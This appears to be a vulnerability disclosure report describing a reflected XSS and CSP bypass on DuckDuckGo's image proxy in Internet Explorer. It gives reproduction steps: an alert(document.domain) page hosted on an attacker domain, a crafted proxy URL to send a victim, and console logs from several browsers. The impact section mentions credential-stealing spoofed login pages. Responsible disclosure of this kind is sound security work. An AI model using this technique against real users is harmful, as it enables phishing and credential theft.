XSS in Subdomain of DuckDuckGo

Hi Team, I would like to report CSP bypass and full fledged reflected xss on ```proxy.duckduckgo.com```. #Description: On proxy domain to avoid script executions there is presence of CSP header ```script-src``` which set to none. In order to exploit this issue a remote attacker need to submit a valid nonce generated by Content Security Policy. But due to the fact that IE still doesn't support this header as stated in ```https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP#Browser_compatibility```. So it is possible to bypass this restriction. #Steps to Reproduce: 1. Host following script in your domain. ``` <html><script>alert(document.domain);</script></html> ``` 2. Share the following URL with victim. ``` https://proxy.duckduckgo.com/iur/?f=1&image_host=http://attackerdomain.com/xsspage ``` 3. Once if victim open the link in IE then he/she can see the script will get executed in the context of duckduckgo domain. #Browser Tested on: 1. IE 11.192 - We can see script execution. 2. Microsoft Edge 41.16299.15.0 - ```CSP14321: Resource violated directive 'script-src 'none'' in Content-Security-Policy: inline script, in https://proxy.duckduckgo.com/iur/?f=1&image_host=http://138.197.172.108/index.html at line 1 column 8. Resource will be blocked.``` 3. Mozilla Firefox 52 - ```Content Security Policy: The page’s settings blocked the loading of a resource at self (“script-src 'none'”). Source: alert(document.domain);``` 4. Google Chrome Version 68.0.3440.106 (Official Build) (64-bit) - ```Refused to execute inline script because it violates the following Content Security Policy directive: "script-src 'none'". Either the 'unsafe-inline' keyword, a hash ('sha256-LNFMfdZ+OpsZfPTkBYm2BOeU5h3C3lAC8Em3x/Rc9mA='), or a nonce ('nonce-...') is required to enable inline execution.``` ## Impact 1. Attacker can host a spoofed login page and can sniff all credentials. 2. It's possible to dos victims browser